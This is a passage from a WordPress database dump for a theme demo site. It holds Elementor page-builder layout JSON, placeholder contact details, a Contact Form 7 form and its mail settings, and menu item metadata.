:{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"cqqjhya\",\"elType\":\"widget\",\"settings\":{\"section_title\":\"\",\"html\":\"<p style=\\\"font-size: 16px; color: #999999;\\\">In case you some questions popped in your mind, Feel free to call, email or even visit us. Also you can write us about whatever you want down below.\\u00a0Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut suscipit odio ante, id dapibus elit condimentum vitae. Maecenas eget orci vitae enim accumsan mollis. In congue nunc velit, sit amet eleifend velit cursus vitae.<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Telephone :<\\/strong> +0028 55 67 67<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Email :<\\/strong> jennier_aster@yourdomain.com<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Address :<\\/strong> 590 Tahoe Keys Blvd Lake Tahoe, CA 96150 - United States<\\/p>\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"html\"}],\"isInner\":false}],\"isInner\":false}]'),(500,362,'_elementor_version','0.4'),(501,363,'_wp_page_template','default'),(502,363,'use_wrapper_space','1'),(503,363,'_use_wrapper_space','field_5858a5302ab1a'),(504,363,'hide_title','1'),(505,363,'_hide_title','field_5629b0afab2ef'),(506,363,'_elementor_edit_mode','builder'),(507,363,'_elementor_data','[{\"id\":\"hvualcf\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ea4pbwe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"al1dqdi\",\"elType\":\"widget\",\"settings\":{\"title\":\"+224 625 27 22 90\",\"header_size\":\"h3\",\"title_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"jur7buq\",\"elType\":\"widget\",\"settings\":{\"title\":\"+224 664 61 36 77\",\"header_size\":\"h3\",\"title_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p247jom\",\"elType\":\"widget\",\"settings\":{\"address\":\"kaloum\"},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false},{\"id\":\"qlp485n\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"vymi2q5\",\"elType\":\"widget\",\"settings\":{\"form_select\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-contact-form\"}],\"isInner\":false}],\"isInner\":false}]'),(508,363,'_elementor_version','0.4'),(812,4,'_form','<div id=\"contact\"  class=\"transparent\">\n<div class=\"form\">\n<div class=\"border\">\n[text* name id:name placeholder \"Name\"]\n[text* email id:email placeholder \"Email\"]\n[text* subject id:subject placeholder \"Subject\"]\n<br>\n[textarea message 45x8 id:message-form placeholder \"Message Here\"]\n[submit class:submit \"Send\"]\n</div>\n</div>\n</div>'),(813,4,'_mail','a:8:{s:7:\"subject\";s:23:\"Demo 7 \"[your-subject]\"\";s:6:\"sender\";s:35:\"[your-name] <wordpress@192.168.1.7>\";s:4:\"body\";s:167:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Demo 7 (http://demo7.magzma.com)\";s:9:\"recipient\";s:29:\"admin.themesawesome@gmail.com\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(814,4,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:23:\"Demo 7 \"[your-subject]\"\";s:6:\"sender\";s:30:\"Demo 7 <wordpress@192.168.1.7>\";s:4:\"body\";s:109:\"Message Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Demo 7 (http://demo7.magzma.com)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:39:\"Reply-To: admin.themesawesome@gmail.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(815,4,'_messages','a:23:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";s:12:\"invalid_date\";s:29:\"The date format is incorrect.\";s:14:\"date_too_early\";s:44:\"The date is before the earliest one allowed.\";s:13:\"date_too_late\";s:41:\"The date is after the latest one allowed.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:20:\"The file is too big.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";s:14:\"invalid_number\";s:29:\"The number format is invalid.\";s:16:\"number_too_small\";s:47:\"The number is smaller than the minimum allowed.\";s:16:\"number_too_large\";s:46:\"The number is larger than the maximum allowed.\";s:23:\"quiz_answer_not_correct\";s:36:\"The answer to the quiz is incorrect.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:13:\"invalid_email\";s:38:\"The e-mail address entered is invalid.\";s:11:\"invalid_url\";s:19:\"The URL is invalid.\";s:11:\"invalid_tel\";s:32:\"The telephone number is invalid.\";}'),(816,4,'_additional_settings',''),(817,4,'_locale','en_US'),(818,4,'_config_errors','a:1:{s:23:\"mail.additional_headers\";a:1:{i:0;a:2:{s:4:\"code\";i:102;s:4:\"args\";a:3:{s:7:\"message\";s:34:\"The %name% field value is invalid.\";s:6:\"params\";a:1:{s:4:\"name\";s:8:\"Reply-To\";}s:4:\"link\";s:90:\"http://contactform7.com/configuration-errors/#mail.additional_headers:error_invalid_syntax\";}}}}'),(970,360,'_edit_lock','1511783359:1'),(971,360,'_edit_last','1'),(972,2,'_edit_lock','1511347509:1'),(973,2,'_edit_last','1'),(974,378,'_edit_last','1'),(975,378,'_wp_page_template','default'),(976,378,'_edit_lock','1509551205:1'),(977,380,'_edit_last','1'),(978,380,'_edit_lock','1509550659:1'),(979,380,'_wp_page_template','default'),(980,359,'_edit_lock','1509552633:1'),(981,359,'_edit_last','1'),(982,383,'_edit_last','1'),(983,383,'_wp_page_template','default'),(984,383,'_edit_lock','1509551546:1'),(985,385,'_edit_last','1'),(986,385,'_wp_page_template','default'),(987,385,'_edit_lock','1509551856:1'),(991,388,'_menu_item_type','post_type'),(992,388,'_menu_item_menu_item_parent','0'),(993,388,'_menu_item_object_id','385'),(994,388,'_menu_item_object','page'),(995,388,'_menu_item_target',''),(996,388,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(997,388,'_menu_item_xfn',''),(998,388,'_menu_item_url',''),(1000,389,'_menu_item_type','post_type'),(1001,389,'_menu_item_menu_item_parent','0'),(1002,389,'_menu_item_object_id','383'),(1003,389,'_menu_item_object','page'),(1004,389,'_menu_item_target',''),(1005,389,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1006,389,'_menu_item_xfn',''),(1007,389,'_menu_item_url',''),(1009,390,'_menu_item_type','post_type'),(1010,390,'_menu_item_menu_item_parent','0'),(1011,390,'_menu_item_object_id','380'),(1012,390,'_menu_item_object','page'),(1013,390,'_menu_item_target',''),(1014,390,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1015,390,'_menu_item_xfn',''),(1016,390,'_menu_item_url',''),(1018,391,'_menu_item_type','post_type'),(1019,391,'_menu_item_menu_item_parent','0'),(1020,391,'_menu_item_object_id','378'),(1021,391,'_menu_item_object','page'),(1022,391,'_menu_item_target',''),(1023,391,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1024,391,'_menu_item_xfn',''),(1025,391,'_menu_item_url',''),(1027,392,'_menu_item_type','post_type'),(1028,392,'_menu_item_menu_item_parent','0'),(1029,392,'_menu_item_object_id','2'),(1030,392,'_menu_item_object','page'),(1031,392,'_menu_item_target',''),(1032,392,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1033,392,'_menu_item_xfn',''),(1034,392,'_menu_item_url',''),(1036,393,'_menu_item_type','post_type'),(1037,393,'_menu_item_menu_item_parent','0'),(1038,393,'_menu_item_object_id','360'),(1039,393,'_menu_item_object','page'),(1040,393,'_menu_item_target',''),(1041,393,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1042,393,'_menu_item_xfn',''),(1043,393,'_menu_item_url',''),(1065,399,'_elementor_edit_mode','builder'),(1066,399,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"3\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"12\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"5\",\"category\":[\"11\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"7\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\